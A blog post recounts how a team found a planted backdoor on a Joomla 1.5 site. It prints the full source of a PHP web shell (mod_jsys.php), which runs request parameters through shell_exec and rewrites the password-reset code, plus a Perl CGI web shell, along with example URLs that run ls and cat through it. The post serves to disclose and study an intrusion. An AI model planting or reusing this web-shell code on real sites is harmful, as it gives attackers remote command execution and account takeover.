Joomla Bug Day at OSCC MAMPU

Joomla Bug Day at OSCC MAMPU

We spend the whole morning discussing about the Joomla! 1.5.x (5 below) bug. You can read Indhran blog about how we reset the admin password.

Rescue Your Joomla 15x Sites

Related blog post

Then Abdullah our Hightech Rojak Blogger found something in the Apache log.

This command

http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=ls

When we tried it using web brower like Mozilla Firefox. We can list all the files in the directory. I used that link to find the location of the mod_lsys.php file and used cat to view the file. Simply from the Mozilla Firefox.


http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=cat%20/var/www/html/cioconf/modules/mod_jsys/mod_jsys.php

--------- mod_jsys.php content

Welcome Welcome

chmod("../../modules/mod_jsys/mod_jsys.cgi", 0755);

if(!empty($_REQUEST['cmd'])) {
$buf = shell_exec($_REQUEST['cmd']);
$buf = str_replace("\n", "
\n", $buf);
echo $buf;
}

if(!empty($_REQUEST['patch'])) {
$fd = fopen("../../components/com_user/models/reset.php", "r");
$fd2 = fopen("../../tmp/p", "w");
if(!$fd) {
echo "Unable to patch";
exit;
}
while($buf = fgets($fd)) {
if(!strpos($buf, "block = 0 AND activation = '.\$db->Quote(")) {
fwrite($fd2, $buf);
}
else {
fwrite($fd2, 'if($db->Quote($token) == "\'\'") {
die("FUCK OFF RETARD");
}'."\n");
fwrite($fd2, ' $db->setQuery(\'SELECT id FROM #__users WHERE block = 0 AND activation = \'.$db->Quote($token));');
}
}
fclose($fd2);
$res = rename("../../tmp/p", "../../components/com_user/models/reset.php");
if($res) {
echo "Patched";
}
else {
echo "Patch failed, unable to copy file";
system("rm -f ../../tmp/p");
}
}

?>

---- mod_jsys.cgi content

#!/usr/bin/perl

print "Content-type: text/html\r\n\r\n";

print "Welcome\n";

@cmd = split(/=/, $ENV{'QUERY_STRING'});
$cmd[1] =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$cmd = `$cmd[1]`;
$cmd =~ s/\n/\n/g;
print $cmd;

Popular Posts

Labels

64bit Activity Adempire advocate Akta Apache ASAS Azam backup backuppc Bash Beowulf Big Data Broadband Budget Centos Cinta Cluster CMS cmsfornerd Company Complain computer Computer Operation Conference Contest Data Centre Operation DBmail Digg Digital Certification Discussion Group Django DNS Docker Domain Duit Online Economy Elastic Stack Elasticsearch ELK email email server English Evangelist Events Family Tree Fedora File System Firefox Foss FOSS.my FreeBSD FTX Gesaan Gluster Gmail Godaddy.com Google Google App GTUG Hacking Hadoop hafnie Harisfazillah Jamel horde HP-UX hwclock IBM ICT Service Delivery and Operation Indonesia Internet Internet Tools Itanium Jabatan IT Negara Jaring Java Javascript Jepun Jiwang Joke Joomla K3S K3Sup Kernel Kesihatan Kibana KOSTEM Kubernetes ldap Linux Linux Counter linuxmalaysia Logstash Love Mailman MailScanner Mailwatch Malay Malaysia MAMPU MDeC meetup Melaka Melayu Merdeka Microsoft Migration mirror sites Money Online Monitor MOSC 2010 MOSC2010 mosc2011 MOSC2013 MOSCMY MOSCMY2014 MOSCMY2015 Mozilla MPI MSC Malaysia MSC Malaysia OSCONF MSCOSCONF My Love MyGOSSCON MyMeeting Mypenguin99 mysql Nagios NagiosQL Negaraku Nginx nss_ldap ntp OBW2014 Open Office Open Source openldap Openoffice.org OpenSSH OpenStack Opera OS2 OS400 OSCC OSCC MAMPU osdc.my OSS OSS Policy OWASP Parallel Computing People Power Personal Petition PGP PHP Pligg Podman Politik Postfix Postgresql Programming Proxmox Python q1moscmy2015 Questionnaires Research Research tools RPM SASSIAN Sassian 85-89 Sassians 85-89 SCO Security Sekolah Sekolah Alam Shah Shell script Software License Solaris SongketMail SongketMailFilter sourceforge spam spamassassin Spoof SSH Survey SVR4 System Tools Technorati Terjemahan Terminal TMnet Tor Training translation Treasury Malaysia Trend Micro Twitter Ubuntu Unix Virtualization VMS VOIP Wang Web Server Windows Zimbra
 

LinuxMalaysia Mastodon